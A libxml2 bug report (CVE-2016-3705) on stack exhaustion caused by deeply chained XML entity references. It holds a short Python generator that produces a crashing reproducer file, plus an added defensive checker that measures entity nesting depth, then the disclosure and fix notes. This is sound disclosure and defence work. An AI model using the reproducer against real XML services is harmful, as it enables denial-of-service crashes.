GNOME Bugzilla – Bug 765207
Stack exhaustion parsing xml in parser
Last modified: 2016-05-22 01:29:40 UTC
It is possible to trigger a stack overflow using a carefully crafted invalid xml file, the stack overflow occurs before libxml2 determines the xml file is invalid. This was branched from https://bugzilla.gnome.org/show_bug.cgi?id=762100 Reproducer and Fixes are available when this bug is private.
Generator for the repeater is below:

#!/bin/python3
f = open('repo.xml', 'w')
f.write("<!DOCTYPE a [ ")
i = 1
while (i < 30000):
    f.write("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
    i = i+1
f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")
f.close()
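The reproducer above builds a DTD in which every internal entity's replacement text references the next entity, so resolving &a1; needs tens of thousands of nested expansions before the parser ever reaches the undefined end of the chain. A defender triaging untrusted XML can measure that chain before handing the document to libxml2. The following is an added example, not code from this bug or from libxml2: it extracts internal general entity declarations with a regular expression (assumption: a simplified scanner that only recognises `<!ENTITY name "value">` and `<!ENTITY name 'value'>` forms, ignoring parameter and external entities), builds the reference graph, and walks it iteratively so the checker itself cannot exhaust the stack. It reports the deepest expansion chain, whether any entity expands to itself, and which referenced entities are undeclared, stopping early once a caller-supplied depth budget is exceeded. The sample DTDs are constructed for the example; `CHAIN_DTD` is a ten-entity version of the reporter's generator output, not the attachment from this bug.

```python
import re
from typing import Dict, List

# Simplified scanner for internal general entities (assumption for this example):
# matches <!ENTITY name "value"> or <!ENTITY name 'value'>. Parameter entities
# (<!ENTITY % ...>) and external entities (SYSTEM/PUBLIC) do not match.
ENTITY_DECL = re.compile(
    r'<!ENTITY\s+([A-Za-z_:][\w.\-:]*)\s+(?:"([^"]*)"|\'([^\']*)\')\s*>')
ENTITY_REF = re.compile(r'&([A-Za-z_:][\w.\-:]*);')


def parse_entities(dtd: str) -> Dict[str, List[str]]:
    """Map each declared entity name to the entity names its value references."""
    graph: Dict[str, List[str]] = {}
    for name, dq, sq in ENTITY_DECL.findall(dtd):
        graph[name] = ENTITY_REF.findall(dq if dq else sq)
    return graph


def analyze_entities(graph: Dict[str, List[str]], limit: int = 256) -> dict:
    """Depth-first walk of the entity reference graph, done iteratively.

    depth:      longest chain of nested references (a leaf value counts 0,
                a reference to an undeclared entity counts 1)
    over_limit: True if a chain would need more than `limit` nested expansions
    cyclic:     True if some entity (transitively) references itself
    undefined:  referenced but undeclared entity names
    """
    undefined, memo = set(), {}          # memo: name -> depth below it
    cyclic, longest = False, 0
    for root in graph:
        if root in memo:
            continue
        on_path = {root}
        # frame = [entity name, iterator over its references, best child depth]
        stack = [[root, iter(graph[root]), 0]]
        while stack:
            frame = stack[-1]
            child = next(frame[1], None)
            if child is None:                      # all references explored
                stack.pop()
                memo[frame[0]] = frame[2]
                on_path.discard(frame[0])
                longest = max(longest, frame[2])
                if stack:
                    stack[-1][2] = max(stack[-1][2], frame[2] + 1)
            elif child in on_path:                 # back edge: entity expands to itself
                cyclic = True
            elif child not in graph:               # reference to an undeclared entity
                undefined.add(child)
                frame[2] = max(frame[2], 1)
            elif child in memo:                    # subtree already resolved
                frame[2] = max(frame[2], memo[child] + 1)
            elif len(stack) >= limit:              # refuse to follow deeper than the budget
                return {"depth": limit, "over_limit": True,
                        "cyclic": cyclic, "undefined": sorted(undefined)}
            else:
                on_path.add(child)
                stack.append([child, iter(graph[child]), 0])
    return {"depth": longest, "over_limit": False,
            "cyclic": cyclic, "undefined": sorted(undefined)}


def check_dtd(text: str, limit: int = 256) -> dict:
    """Convenience wrapper: scan a document's DTD and analyse its entity chains."""
    return analyze_entities(parse_entities(text), limit)


# Constructed sample inputs (not the attachment from this bug).
# Ten-entity version of the reporter's generator: a1 -> a2 -> ... -> a10 -> a11,
# where a11 is never declared and a12 refers back to a1.
CHAIN_DTD = ('<!DOCTYPE a [ '
             + ''.join('<!ENTITY a%d "&a%d;">' % (i, i + 1) for i in range(1, 11))
             + '<!ENTITY a12 "&a1;">]> <bruces bogans="&a1;">')
CYCLE_DTD = '<!DOCTYPE a [<!ENTITY x "&y;"><!ENTITY y "&x;">]><a>&x;</a>'
BENIGN_DTD = ('<!DOCTYPE a [<!ENTITY company "Example Corp">'
              '<!ENTITY sig \'&company; legal\'>]><a>&sig;</a>')

if __name__ == "__main__":
    for label, doc in (("chain", CHAIN_DTD), ("cycle", CYCLE_DTD), ("benign", BENIGN_DTD)):
        print(label, check_dtd(doc, limit=5))
```

With `limit=5` the chain sample is rejected as soon as the walk is five expansions deep, without resolving the rest of the chain; with the default budget it reports a depth of 11 and the undeclared `a11`. The budget is the knob to tune: a legitimate DTD rarely nests entity references more than a handful of levels, so a low limit catches this class of input cheaply before the parser's own recursion is involved.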
Created attachment 327227 [details] Reproducer
Created attachment 327229 [details] [review] Patch fix
This bug will shortly be disclosed on the oss-security mailing list, you can make it public now.
FTR, this issue has been assigned CVE-2016-3705.
Fix committed at: https://git.gnome.org/browse/libxml2/commit/?id=8f30bdff69edac9075f4663ce3b56b0c52d48ce6 thanks, Daniel